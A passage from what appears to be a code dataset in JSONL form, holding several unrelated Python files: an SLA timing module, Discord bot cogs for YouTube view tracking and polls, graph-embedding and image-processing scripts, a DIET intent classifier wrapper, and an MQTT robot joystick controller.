\"service_level_agreement_creation\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"hidden\": 1,\n\t\t\t\"label\": \"Service Level Agreement Creation\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"depends_on\": \"eval:!doc.__islocal\",\n\t\t\t\"fieldname\": \"resolution_date\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"Resolution Date\",\n\t\t\t\"no_copy\": 1,\n\t\t\t\"read_only\": 1\n\t\t}\n\t]\n\n\ndef update_agreement_status_on_custom_status(doc):\n\t# Update Agreement Fulfilled status using Custom Scripts for Custom Status\n\n\tmeta = frappe.get_meta(doc.doctype)\n\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\tif meta.has_field(\"first_responded_on\") and not doc.first_responded_on:\n\t\t# first_responded_on set when first reply is sent to customer\n\t\tdoc.response_by_variance = round(time_diff_in_seconds(doc.response_by, now_time), 2)\n\n\tif meta.has_field(\"resolution_date\") and not doc.resolution_date:\n\t\t# resolution_date set when issue has been closed\n\t\tdoc.resolution_by_variance = round(time_diff_in_seconds(doc.resolution_by, now_time), 2)\n\n\tif meta.has_field(\"agreement_status\"):\n\t\tdoc.agreement_status = \"Fulfilled\" if doc.response_by_variance > 0 and doc.resolution_by_variance > 0 else \"Failed\"\n\n\ndef update_agreement_status(doc, meta):\n\tif meta.has_field(\"service_level_agreement\") and meta.has_field(\"agreement_status\") and \\\n\t\tdoc.service_level_agreement and doc.agreement_status == \"Ongoing\":\n\n\t\tapply_sla_for_resolution = frappe.db.get_value(\"Service Level Agreement\", doc.service_level_agreement,\n\t\t\t\"apply_sla_for_resolution\")\n\n\t\t# if SLA is applied for resolution check for response and resolution, else only response\n\t\tif apply_sla_for_resolution:\n\t\t\tif meta.has_field(\"response_by_variance\") and meta.has_field(\"resolution_by_variance\"):\n\t\t\t\tif cint(frappe.db.get_value(doc.doctype, doc.name, \"response_by_variance\")) < 0 or \\\n\t\t\t\t\tcint(frappe.db.get_value(doc.doctype, doc.name, \"resolution_by_variance\")) < 0:\n\n\t\t\t\t\tdoc.agreement_status = \"Failed\"\n\t\t\t\telse:\n\t\t\t\t\tdoc.agreement_status = \"Fulfilled\"\n\t\telse:\n\t\t\tif meta.has_field(\"response_by_variance\") and \\\n\t\t\t\tcint(frappe.db.get_value(doc.doctype, doc.name, \"response_by_variance\")) < 0:\n\t\t\t\tdoc.agreement_status = \"Failed\"\n\t\t\telse:\n\t\t\t\tdoc.agreement_status = \"Fulfilled\"\n\n\ndef is_holiday(date, holidays):\n\treturn getdate(date) in holidays\n\n\ndef get_time_in_timedelta(time):\n\t\"\"\"Converts datetime.time(10, 36, 55, 961454) to datetime.timedelta(seconds=38215).\"\"\"\n\timport datetime\n\treturn datetime.timedelta(hours=time.hour, minutes=time.minute, seconds=time.second)\n\n\ndef set_response_by_and_variance(doc, meta, start_date_time, priority):\n\tif meta.has_field(\"response_by\"):\n\t\tdoc.response_by = get_expected_time_for(parameter=\"response\", service_level=priority, start_date_time=start_date_time)\n\n\tif meta.has_field(\"response_by_variance\") and not doc.get('first_responded_on'):\n\t\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\t\tdoc.response_by_variance = round(time_diff_in_seconds(doc.response_by, now_time), 2)\n\ndef set_resolution_by_and_variance(doc, meta, start_date_time, priority):\n\tif meta.has_field(\"resolution_by\"):\n\t\tdoc.resolution_by = get_expected_time_for(parameter=\"resolution\", service_level=priority, start_date_time=start_date_time)\n\n\tif meta.has_field(\"resolution_by_variance\") and not doc.get(\"resolution_date\"):\n\t\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\t\tdoc.resolution_by_variance = round(time_diff_in_seconds(doc.resolution_by, now_time), 2)\n\n\ndef now_datetime(user):\n\tdt = convert_utc_to_user_timezone(datetime.utcnow(), user)\n\treturn dt.replace(tzinfo=None)\n\n\ndef convert_utc_to_user_timezone(utc_timestamp, user):\n\tfrom pytz import timezone, UnknownTimeZoneError\n\n\tuser_tz = get_tz(user)\n\tutcnow = timezone('UTC').localize(utc_timestamp)\n\ttry:\n\t\treturn utcnow.astimezone(timezone(user_tz))\n\texcept UnknownTimeZoneError:\n\t\treturn utcnow\n\n\ndef get_tz(user):\n\treturn frappe.db.get_value(\"User\", user, \"time_zone\") or get_time_zone()\n\n\n@frappe.whitelist()\ndef get_user_time(user, to_string=False):\n\treturn get_datetime_str(now_datetime(user)) if to_string else now_datetime(user)\n\n\n@frappe.whitelist()\ndef get_sla_doctypes():\n\tdoctypes = []\n\tdata = frappe.get_list('Service Level Agreement',\n\t\t{'enabled': 1},\n\t\t['document_type'],\n\t\tdistinct=1\n\t)\n\n\tfor entry in data:\n\t\tdoctypes.append(entry.document_type)\n\n\treturn doctypes\n","sub_path":"verp/support/doctype/service_level_agreement/service_level_agreement.py","file_name":"service_level_agreement.py","file_ext":"py","file_size_in_byte":31190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"127178266","text":"from discord.ext import commands, tasks\nimport aiohttp\nfrom bs4 import BeautifulSoup as soup\nfrom datetime import *\nimport asyncio\nfrom module import logger as log\nfrom Utility import fetch_all, fetch_one, DBconn, c\n\n\nclass Youtube(commands.Cog):\n def __init__(self, client):\n self.client = client\n pass\n\n @commands.command()\n @commands.is_owner()\n async def addurl(self, ctx, link):\n \"\"\"Add url to youtube videos [Format: %addurl (link)]\"\"\"\n if 'youtube.com' in link or 'youtu.be' in link:\n try:\n c.execute(\"INSERT INTO currency.Links VALUES(%s)\", (link,))\n DBconn.commit()\n await ctx.send(\"> **That video is now being traced**\")\n except Exception as e:\n log.console (e)\n await ctx.send(\"> **That video is already being tracked.**\")\n\n @commands.command()\n @commands.is_owner()\n async def removeurl(self, ctx, link):\n \"\"\"Remove url from youtube videos [Format: %removeurl (link)]\"\"\"\n try:\n c.execute(\"DELETE FROM currency.Links WHERE Link = %s\", (link,))\n DBconn.commit()\n await ctx.send(\"> **That video has been deleted**\")\n except:\n await ctx.send(\"> **That video is not being tracked.**\")\n\n @commands.command()\n @commands.is_owner()\n async def scrapeyoutube(self, ctx):\n \"\"\"Scrape Youtube Video\"\"\"\n c.execute(\"SELECT link FROM currency.links\")\n links = fetch_all()\n for link in links:\n c.execute(\"SELECT LinkID FROM currency.links WHERE Link = %s\", (link,))\n id = fetch_one()\n async with aiohttp.ClientSession() as session:\n async with session.get('{}'.format(link[0])) as r:\n if r.status == 200:\n page_html = await r.text()\n log.console(page_html)\n page_soup = soup(page_html, \"html.parser\")\n view_count = (page_soup.find(\"div\", {\"class\": \"watch-view-count\"})).text\n # c.execute(\"INSERT INTO currency.ViewCount VALUES (%s,%s)\", (id,datetime.now()))\n # DBconn.commit()\n await ctx.send(f\"> **Managed to scrape DC SCREAM -- {view_count} -- {datetime.now()}**\")\n\n @commands.command()\n @commands.is_owner()\n async def stoploop(self, ctx):\n \"\"\"Stops scraping youtube videos [Format: %stoploop]\"\"\"\n YoutubeLoop().new_task5.stop()\n await ctx.send(\"> **If there was a loop, it stopped.**\")\n\n @commands.command()\n @commands.is_owner()\n async def startloop(self, ctx, seconds=0):\n \"\"\"Starts scraping youtube videos [Format: %startloop (seconds)]\"\"\"\n try:\n if seconds >= 0:\n await asyncio.sleep(seconds)\n YoutubeLoop().new_task5.start()\n await ctx.send(\"> **Loop started.**\")\n except:\n await ctx.send(\"> **A loop is already running.**\")\n\n\nclass YoutubeLoop:\n def __init__(self):\n self.view_count = []\n self.now = []\n pass\n\n @tasks.loop(seconds=0, minutes=30, hours=0, reconnect=True)\n async def new_task5(self):\n check = True\n try:\n c.execute(\"SELECT link FROM currency.links\")\n links = fetch_all()\n except Exception as e:\n check = False\n pass\n if check:\n try:\n for link in links:\n c.execute(\"SELECT LinkID FROM currency.links WHERE Link = %s\", link)\n link_id = fetch_one()\n async with aiohttp.ClientSession() as session:\n async with session.get('{}'.format(link[0])) as r:\n if r.status == 200:\n page_html = await r.text()\n # log.console(page_html)\n page_soup = soup(page_html, \"html.parser\")\n view_count = (page_soup.find(\"div\", {\"class\": \"watch-view-count\"})).text\n now = datetime.now()\n c.execute(\"INSERT INTO currency.ViewCount VALUES (%s,%s,%s)\", (link_id, view_count, now))\n self.view_count.append(view_count)\n self.now.append(now)\n DBconn.commit()\n # log.console(\"Updated Video Views Tracker\")\n except Exception as e:\n log.console(e)\n self.view_count = []\n self.now = []\n","sub_path":"module/Youtube.py","file_name":"Youtube.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"459652747","text":"from .core import CoreBot\nfrom .utils import getname\nfrom .args import Arg\nimport discord\nimport asyncio\n\ndef EnablePolls(bot):\n if not isinstance(bot, CoreBot):\n raise TypeError(\"This function must take a CoreBot\")\n\n bot.polls = {}\n\n @bot.add_command(\n 'poll',\n Arg('title', help=\"Poll Title\"),\n Arg(\"options\", nargs='*', help=\"Poll options\"),\n delimiter='|'\n )\n async def cmd_poll(self, message, args):\n \"\"\"\n `$!poll | [Option 1] | [Option 2] | [etc...]` : Creates a poll\n Example: `$!poll Is $NAME cool? | Yes | Definitely`\n \"\"\"\n #The argparse API is killing the blank handling, but I think that's okay\n opts = [\n (opt.rstrip() if '~' not in opt else opt)\n for opt in args.options\n ]\n if sum(1 for opt in opts if not len(opt)):\n await self.send_message(\n message.author,\n \"Your poll command contained trailing or adjacent `|` characters\"\n \" which resulted in blank fields that I'm going to ignore. If\"\n \" the blank fields were intentional, add `~` into each\"\n \" field that you want to leave blank\"\n )\n opts = [opt.replace('~', '') for opt in opts if len(opt)]\n body = getname(message.author)+\" has started a poll:\\n\"\n body+=args.title+\"\\n\"\n body+=\"\\n\".join((\n \"%d) %s\"%(num+1, opt)\n for (num, opt) in\n enumerate(opts)\n ))\n body+=\"\\n\\nReact with your vote\"\n target = await self.send_message(\n message.channel,\n body,\n skip_debounce=True\n )\n for i in range(1,len(opts)+1):\n await target.add_reaction(\n (b'%d\\xe2\\x83\\xa3'%i).decode()#hack to create number emoji reactions\n )\n if not isinstance(message.channel, discord.PrivateChannel):\n try:\n await message.delete()\n except:\n print(\"Warning: Unable to delete poll source message\")\n self.polls[target.id] = (message.author, set())\n\n @bot.subscribe('reaction_add')\n async def on_reaction_add(self, event, reaction, user):\n if reaction.message.id in self.polls:\n creator, reactors = self.polls[reaction.message.id]\n if user.id not in reactors:\n await self.send_message(\n creator,\n getname(user)+\" has voted on your poll in \"+reaction.message.channel.name\n )\n self.polls[reaction.message.id][1].add(user.id)\n\n return bot\n","sub_path":"bots/poll.py","file_name":"poll.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314635521","text":"from karateclub import GL2Vec, Graph2Vec\nimport pandas as pd\nimport os\nfrom collect_dep_graph_features import control_flow_graph_extraction, dep_graph_handcrafted_features_extraction\nfrom control_flow import Control_flow\nfrom handcrafted_dependencies import Dependencies\nfrom settings import tsvc_benchmark, polybench_benchmark, generated_benchmark, features_path, \\\n control_graph_characteristics, \\\n dep_graph_characteristics\nimport networkx as nx\nfrom auxiliary_functions import save_to_cvs\n\n\ndef get_embeddings(data, model):\n \"\"\"\n :param data: (list) list of graphs for those we want to get Embeddings\n :param model: (model) model that will be used to learn Embeddings\n :return: (numpy array) Embeddings\n \"\"\"\n model.fit(data)\n X = model.get_embedding()\n return X\n\n\ndef multiply_embeddings(data, data_label, models=[GL2Vec, Graph2Vec],\n dimensions=[2 ** 6, 2 ** 7, 2 ** 8, 2 ** 9, 2 ** 10]):\n \"\"\"\n This function return a list of embeddings for given dimensions and given models\n :return: (list, list) - list of embeddings and list of names for each space\n \"\"\"\n embeddings = []\n names = []\n\n for idx, model in enumerate(models):\n for dimension in dimensions:\n embeddings.append(get_embeddings(data, model(dimensions=dimension)))\n names.append('{}_model_{}_{}'.format(data_label, str(idx + 1), str(dimension)))\n return embeddings, names\n\n\ndef get_all_graphs(extension=''):\n \"\"\"\n This function gets dep. and control flow graphs for both benchmarks and all returns corresponding kernel names\n \"\"\"\n tsvc_control_flow, tsvc_control_names = control_flow_graph_extraction(Control_flow(), tsvc_benchmark.cfg_graphs,\n extension)\n poly_control_flow, poly_control_names = control_flow_graph_extraction(Control_flow(),\n polybench_benchmark.cfg_graphs, extension)\n generated_control_flow, generated_control_names = control_flow_graph_extraction(Control_flow(),\n generated_benchmark.cfg_graphs,\n extension)\n\n features_poly, poly_dep_graph_names, poly_dep_graphs = dep_graph_handcrafted_features_extraction(Dependencies(),\n polybench_benchmark.dep_graphs,\n extension,\n polybench_benchmark.dep_graphs_features)\n features_tsvc, tsvc_dep_graph_names, tsvc_dep_graphs = dep_graph_handcrafted_features_extraction(Dependencies(),\n tsvc_benchmark.dep_graphs,\n extension,\n tsvc_benchmark.dep_graphs_features,\n False)\n\n features_generated, generated_dep_graph_names, generated_dep_graphs = dep_graph_handcrafted_features_extraction(\n Dependencies(),\n generated_benchmark.dep_graphs,\n extension,\n generated_benchmark.dep_graphs_features,\n False)\n\n control_flow_graphs = poly_control_flow + tsvc_control_flow + generated_control_flow\n dep_graphs = poly_dep_graphs + tsvc_dep_graphs + generated_dep_graphs\n control_names = poly_control_names + tsvc_control_names + generated_control_names\n dep_names = poly_dep_graph_names + tsvc_dep_graph_names + generated_dep_graph_names\n return control_flow_graphs, control_names, dep_graphs, dep_names\n\n\ndef compute_graph_characteristics(control_flow_graphs, control_names, dep_graphs, dep_names):\n \"\"\"\n This function computes some graph characteristics for both benchmarks\n :param control_flow_graphs: list, list of control flow graphs\n :param control_names: list, list of names corresponding to control flow graphs\n :param dep_graphs: list, list of dependence graphs\n :param dep_names: list, list of names corresponding to dependence graphs\n :return: (dict, dict) each dictionary contains kernel name as value, dict of characteristics as value. Two dictionaries\n correspond to characteristics for 2 types of graphs: Dependence and Control Flow\n \"\"\"\n number_of_nodes_control_graph = [nx.number_of_nodes(G) for G in control_flow_graphs]\n number_of_edges_control_graph = [nx.number_of_edges(G) for G in control_flow_graphs]\n\n characteristics_control_flow = {}\n for idx, control_name in enumerate(control_names):\n characteristics_control_flow[control_name] = {'Edges_control': number_of_edges_control_graph[idx],\n 'Nodes_control': number_of_nodes_control_graph[idx],\n 'label': control_name\n }\n\n scc_dependence_graph = [nx.number_strongly_connected_components(G) for G in dep_graphs]\n scc_size_dependence_graph = [\n len(max(nx.strongly_connected_components(G), key=len)) if nx.number_of_edges(G) > 0 else 0 for G in dep_graphs]\n number_of_nodes_dependence_graph = [nx.number_of_nodes(G) for G in dep_graphs]\n number_of_edges_dependence_graph = [nx.number_of_edges(G) for G in dep_graphs]\n\n characteristics_dependence_graph = {}\n for idx, control_name in enumerate(dep_names):\n characteristics_dependence_graph[control_name] = {'Edges_dep': number_of_edges_dependence_graph[idx],\n 'Nodes_dep': number_of_nodes_dependence_graph[idx],\n 'Number_of_SCC': scc_dependence_graph[idx],\n 'Nodes in the larges SCC': scc_size_dependence_graph[idx],\n 'label': control_name\n }\n\n return characteristics_control_flow, characteristics_dependence_graph\n\n\ndef create_embeddings(control_flow_graphs, control_names, dep_graphs, dep_names):\n \"\"\"\n This function creates all possible combinations of embeddings and stores them to csv\n :param control_flow_graphs: list, list of control flow graphs\n :param control_names: list, list of names corresponding to control flow graphs\n :param dep_graphs: list, list of dependence graphs\n :param dep_names: list, list of names corresponding to dependence graphs\n :return: list, list of numpy arrays - embeddings\n \"\"\"\n data_frames = []\n control_flow_embeddings = multiply_embeddings(control_flow_graphs, 'control')\n dep_graph_embeddings = multiply_embeddings(dep_graphs, 'dependencies')\n names = control_flow_embeddings[1] + dep_graph_embeddings[1]\n\n for embedding in control_flow_embeddings[0]:\n df = pd.DataFrame(embedding)\n df['label'] = control_names\n data_frames.append(df)\n\n for embedding in dep_graph_embeddings[0]:\n df = pd.DataFrame(embedding)\n df['label'] = dep_names\n data_frames.append(df)\n\n for idx, df in enumerate(data_frames):\n df.to_csv(os.path.join(features_path, names[idx]))\n\n return data_frames\n\n\ndef main():\n all_graph_information = get_all_graphs()\n characteristics_control_flow, characteristics_dependence_graph = compute_graph_characteristics(\n *all_graph_information)\n save_to_cvs(list(characteristics_dependence_graph.values()), dep_graph_characteristics)\n save_to_cvs(list(characteristics_control_flow.values()), control_graph_characteristics)\n create_embeddings(*all_graph_information)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":8220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"527603808","text":"'''\nUTFPR - Cornélio Procópio\nDisciplina: Processamento de Imagens\nAluno: Leonardo Batista\nRA: 1885189\n'''\n'''\nexecutar código com: \npython -t OPERATION -i imagem.jpg\nOPERATION disponíveis: \na) inverse\nb) change-column\nc) change-row\nd) histogram-strechting\n'''\n######################################################\n################### Prática 01 #######################\n######################################################\n\nimport cv2 as cv\nimport numpy as np\nimport argparse\n\n#a) inverter os valores de intensidade da imagem, tal que o valor 255 passa a ser 0, 254 passa a ser 1,assim por diante.\ndef inverse(gray):\n rows = gray.shape[0]\n cols = gray.shape[1]\n new_gray = np.ndarray((rows, cols))\n\n for i in range(rows):\n for j in range(cols):\n new_gray[i][j] = 255 - gray[i][j]\n\n cv.imwrite('a_practice1.png', new_gray)\n print('the image has complete inversed')\n\n#b) altera as colunas \ndef changeCols(gray):\n rows = gray.shape[0]\n cols = gray.shape[1]\n new_gray = np.ndarray((rows, cols))\n\n for i in range(rows):\n for j in range(0, cols, 2):\n try:\n new_gray[i][j] = gray[i][j + 1]\n new_gray[i][j + 1] = gray[i][j]\n except:\n continue\n cv.imwrite('b_practice1.png', new_gray)\n print('the column has changed')\n\n#c) altera as linhas\ndef changeRows(gray):\n rows = gray.shape[0]\n cols = gray.shape[1]\n new_gray = np.ndarray((rows, cols))\n\n for i in range(0, rows, 2):\n for j in range(cols):\n try:\n new_gray[i][j] = gray[i + 1][j]\n new_gray[i + 1][j] = gray[i][j]\n except:\n continue\n cv.imwrite('c_practice1.png', new_gray)\n print('the row has changed')\n\n#d) histogram strechting\ndef histogramStrechting(gray, gmax, gmin):\n rows = gray.shape[0]\n cols = gray.shape[1]\n new_gray = np.ndarray((rows, cols))\n\n fmax = np.max(gray)\n fmin = np.min(gray)\n\n # Loop em cada pixel para ser recalculado o novo valor de intensidade\n for row in range(rows):\n for column in range(cols):\n f = gray[row][column]\n g = ((gmax - gmin)/(fmax-fmin))*(f - fmin) + gmin\n new_gray[row][column] = int(g)\n\n cv.imwrite('d_practice1.jpg', gray)\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Image processing\")\n parser.add_argument('-t', '--operation', help='The operation to apply on image', required=True)\n parser.add_argument('-i', '--image', help='Image path', required=True)\n args = vars(parser.parse_args())\n\n img = cv.imread(args['image']) # Carregando Imagem\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY) # Transformando a imagem em escala de cinza\n\n if args['operation'] == 'inverse':\n inverse(gray)\n elif args['operation'] == 'change-column':\n changeCols(gray)\n elif args['operation'] == 'change-row':\n changeRows(gray)\n elif args['operation'] == 'histogram-strechting':\n histogramStrechting(gray, 255, 0)\n else:\n print('The operation informed is incorrect')\n\nif __name__ == '__main__':\n main()","sub_path":"practice1.py","file_name":"practice1.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"328122689","text":"from os import path, listdir\nfrom typing import Union, Dict, List, Any, Tuple\n\nimport torch\nimport yaml\nfrom transformers import BertTokenizerFast\n\nimport os\nimport sys\n\nsys.path.append(os.getcwd())\n\nfrom src.models.classifier import DIETClassifier, DIETClassifierConfig\nfrom src.models.trainer import DIETTrainer\nfrom src.data_reader.dataset import DIETClassifierDataset\nfrom src.data_reader.data_reader import make_dataframe\n\n\nclass DIETClassifierWrapper:\n \"\"\"Wrapper for DIETClassifier.\"\"\"\n def __init__(self, config: Union[Dict[str, Dict[str, Any]], str]):\n \"\"\"\n Create wrapper with configuration.\n\n :param config: config in dictionary format or path to config file (.yml)\n \"\"\"\n if isinstance(config, str):\n try:\n f = open(config, \"r\")\n except Exception as ex:\n raise RuntimeError(f\"Cannot read config file from {config}: {ex}\")\n self.config_file_path = config\n config = yaml.load(f)\n\n self.config = config\n self.util_config = config.get(\"util\", None)\n\n model_config_dict = config.get(\"model\", None)\n if not model_config_dict:\n raise ValueError(f\"Config file should have 'model' attribute\")\n\n self.dataset_config = model_config_dict\n\n if model_config_dict[\"device\"] is not None:\n self.device = torch.device(model_config_dict[\"device\"]) if torch.cuda.is_available() else torch.device(\n \"cpu\")\n\n model_config_attributes = [\"model\", \"intents\", \"entities\"]\n # model_config_dict = {k: v for k, v in model_config_dict.items() if k in model_config_attributes}\n\n self.intents = model_config_dict[\"intents\"]\n self.entities = [\"O\"] + model_config_dict[\"entities\"]\n\n self.model_config = DIETClassifierConfig(**{k: v for k, v in model_config_dict.items() if k in model_config_attributes})\n\n training_config_dict = config.get(\"training\", None)\n if not training_config_dict:\n raise ValueError(f\"Config file should have 'training' attribute\")\n\n self.training_config = training_config_dict\n self.tokenizer = BertTokenizerFast.from_pretrained(model_config_dict[\"tokenizer\"])\n self.model = DIETClassifier(config=self.model_config)\n\n self.model.to(self.device)\n\n self.softmax = torch.nn.Softmax(dim=-1)\n\n self.synonym_dict = {} if not model_config_dict.get(\"synonym\") else model_config_dict[\"synonym\"]\n\n def tokenize(self, sentences) -> Tuple[Dict[str, Any], List[List[Tuple[int, int]]]]:\n \"\"\"\n Tokenize sentences using tokenizer.\n :param sentences: list of sentences\n :return: tuple(tokenized sentences, offset_mapping for sentences)\n \"\"\"\n inputs = self.tokenizer(sentences, return_tensors=\"pt\", return_attention_mask=True, return_token_type_ids=True,\n return_offsets_mapping=True,\n padding=True, truncation=True)\n\n offset_mapping = inputs[\"offset_mapping\"]\n inputs = {k: v.to(self.device) for k, v in inputs.items() if k != \"offset_mapping\"}\n\n return inputs, offset_mapping\n\n def convert_intent_logits(self, intent_logits: torch.tensor) -> List[Dict[str, float]]:\n \"\"\"\n Convert logits from model to predicted intent,\n\n :param intent_logits: output from model\n :return: dictionary of predicted intent\n \"\"\"\n softmax_intents = self.softmax(intent_logits)\n\n predicted_intents = []\n\n for sentence in softmax_intents:\n sentence = sentence[0]\n\n sorted_sentence = sentence.clone()\n sorted_sentence, _ = torch.sort(sorted_sentence)\n\n if sorted_sentence[-1] >= self.util_config[\"intent_threshold\"] and (\n sorted_sentence[-1] - sorted_sentence[-2]) >= self.util_config[\"ambiguous_threshold\"]:\n max_probability = torch.argmax(sentence)\n else:\n max_probability = -1\n\n predicted_intents.append({\n \"intent\": None if max_probability == -1 else self.intents[max_probability],\n \"intent_ranking\": {\n intent_name: probability.item() for intent_name, probability in zip(self.intents, sentence)\n }\n })\n\n return predicted_intents\n\n def convert_entities_logits(self, entities_logits: torch.tensor, offset_mapping: torch.tensor) -> List[\n List[Dict[str, Any]]]:\n \"\"\"\n Convert logits to predicted entities\n\n :param entities_logits: entities logits from model\n :param offset_mapping: offset mapping for sentences\n :return: list of predicted entities\n \"\"\"\n softmax_entities = self.softmax(entities_logits)\n\n predicted_entities = []\n\n for sentence, offset in zip(softmax_entities, offset_mapping):\n predicted_entities.append([])\n latest_entity = None\n for word, token_offset in zip(sentence, offset[1:]):\n max_probability = torch.argmax(word)\n if word[max_probability] >= self.util_config[\"entities_threshold\"] and max_probability != 0:\n if self.entities[max_probability] != latest_entity:\n latest_entity = self.entities[max_probability]\n predicted_entities[-1].append({\n \"entity_name\": self.entities[max_probability],\n \"start\": token_offset[0].item(),\n \"end\": token_offset[1].item()\n })\n else:\n predicted_entities[-1][-1][\"end\"] = token_offset[1].item()\n else:\n latest_entity = None\n\n return predicted_entities\n\n def predict(self, sentences: List[str]) -> List[Dict[str, Any]]:\n \"\"\"\n Predict intent and entities from sentences.\n\n :param sentences: list of sentences\n :return: list of prediction\n \"\"\"\n inputs, offset_mapping = self.tokenize(sentences=sentences)\n outputs = self.model(**inputs)\n logits = outputs[\"logits\"]\n predicted_intents = self.convert_intent_logits(intent_logits=logits[1])\n predicted_entities = self.convert_entities_logits(entities_logits=logits[0], offset_mapping=offset_mapping)\n predicted_outputs = []\n for sentence, intent_sentence, entities_sentence in zip(sentences, predicted_intents, predicted_entities):\n predicted_outputs.append({})\n predicted_outputs[-1].update(intent_sentence)\n predicted_outputs[-1].update({\"entities\": entities_sentence})\n for entity in predicted_outputs[-1][\"entities\"]:\n entity[\"text\"] = sentence[entity[\"start\"]: entity[\"end\"]]\n\n if self.synonym_dict.get(entity[\"text\"], None):\n entity[\"original_text\"] = entity[\"text\"]\n entity[\"text\"] = self.synonym_dict[entity[\"text\"]]\n\n predicted_outputs[-1][\"text\"] = sentence\n\n return predicted_outputs\n\n def save_pretrained(self, directory: str):\n \"\"\"\n Save model and tokenizer to directory\n\n :param directory: path to save folder\n :return: None\n \"\"\"\n self.model.save_pretrained(directory)\n self.tokenizer.save_pretrained(directory)\n\n config_file_path = \"config.yml\" if not self.config_file_path else self.config_file_path\n\n try:\n f = open(config_file_path, \"w\")\n yaml.dump(self.config, f, sort_keys=False)\n f.close()\n except Exception as ex:\n raise RuntimeError(f\"Cannot save config to {config_file_path} by error: {ex}\")\n\n def train_model(self, save_folder: str = \"latest_model\"):\n \"\"\"\n Create trainer, train and save best model to save_folder\n :param save_folder: path to save folder\n :return: None\n \"\"\"\n dataset_folder = self.dataset_config[\"dataset_folder\"]\n if not path.exists(dataset_folder):\n raise ValueError(f\"Folder {dataset_folder} is not exists\")\n\n files_list = [path.join(dataset_folder, f) for f in listdir(dataset_folder) if path.isfile(path.join(dataset_folder, f)) and f.endswith(\".yml\")]\n\n df, _, _, synonym_dict = make_dataframe(files=files_list)\n\n self.synonym_dict.update(synonym_dict)\n self.config[\"model\"][\"synonym\"] = self.synonym_dict\n\n dataset = DIETClassifierDataset(dataframe=df, tokenizer=self.tokenizer, entities=self.entities[1:], intents=self.intents)\n\n trainer = DIETTrainer(model=self.model, dataset=dataset,\n train_range=self.training_config[\"train_range\"],\n num_train_epochs=self.training_config[\"num_train_epochs\"],\n per_device_train_batch_size=self.training_config[\"per_device_train_batch_size\"],\n per_device_eval_batch_size=self.training_config[\"per_device_eval_batch_size\"],\n warmup_steps=self.training_config[\"warmup_steps\"],\n weight_decay=self.training_config[\"weight_decay\"],\n logging_dir=self.training_config[\"logging_dir\"],\n early_stopping_patience=self.training_config[\"early_stopping_patience\"],\n early_stopping_threshold=self.training_config[\"early_stopping_threshold\"],\n output_dir=self.training_config[\"output_dir\"])\n\n trainer.train()\n\n self.save_pretrained(directory=save_folder)\n\n\nif __name__ == \"__main__\":\n config_file = \"src/config.yml\"\n\n wrapper = DIETClassifierWrapper(config=config_file)\n\n print(wrapper.predict([\"I work on office hours\"]))\n\n wrapper.train_model()\n\n print(wrapper.predict([\"What is the average working hours\"]))\n\n\n","sub_path":"src/models/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":9971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200661604","text":"from machine import Pin\nfrom board import *\nfrom drv8833 import DRV8833\nfrom mqttclient import MQTTClient\nimport time, gc\nfrom math import fabs\n\n# robot controlled by joystick\n\n# remote led control\nled = Pin(LED, mode=Pin.OUT)\n\n# mqtt\nBROKER = \"iot.eclipse.org\"\nBROKER = \"mac15.home\"\nBROKER = \"habiandev.local\"\nBROKER = \"dev.home\"\nmqtt = MQTTClient(BROKER)\nprint(\"connected to broker at\", BROKER)\n\nrun = True\nx = y = 0\nbrake = False\n\ndef set_speed():\n global motors, x, y, brake\n if brake:\n motors.brake(0)\n motors.brake(1)\n return\n sp0 = x + y\n sp1 = x - y\n if fabs(sp0) < 0.1: sp0 = 0\n if fabs(sp1) < 0.1: sp1 = 0\n print(\"setspeed x={:6.3f}, y={:6.3f} --> sp0={:6.3f} sp1={:6.3f}\".format(x, y, sp0, sp1))\n motors.speed(0, sp0)\n motors.speed(1, sp1)\n\ndef mqtt_callback(topic, msg):\n msg = msg.decode(\"utf-8\")\n global led, run, motors, x, y, brake\n if topic == b'stop':\n brake = msg == 'True'\n led(brake)\n if brake:\n print(\"apply emergency brake\")\n motors.brake(0)\n motors.brake(1)\n else:\n print(\"release brake\")\n elif topic == b'x':\n x = float(msg)\n set_speed()\n elif topic == b'y':\n y = float(msg)\n set_speed()\n elif topic == b'repl2':\n run = False\n\n\nmqtt.set_callback(mqtt_callback)\nmqtt.subscribe(\"repl\")\nmqtt.subscribe(\"x\")\nmqtt.subscribe(\"y\")\nmqtt.subscribe(\"stop\")\n\n\n# motor controller\n\nfreq = 100\nstop = False\nmotors = None\n\ndef speed_to_freq(speed):\n f = 2500*fabs(speed)-450\n return min(max(20, f), 500)\n\n\nwith DRV8833(freq, A20, A21, A19, A18) as m:\n m.pwm_freq(0, speed_to_freq)\n m.pwm_freq(1, speed_to_freq)\n motors = m\n while run:\n if gc.mem_free() < 20000:\n gc.collect()\n # check for messages\n mqtt.check_msg()\n time.sleep_ms(50)\n\nmqtt.disconnect()\n\nprint(\"returning control to repl\")\n","sub_path":"boards/esp32/libraries/projects/joystick/J_robot_joystick.py","file_name":"J_robot_joystick.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601595591","text":"import copy\nimport json\nimport psimi\nfrom lxml import etree as ET 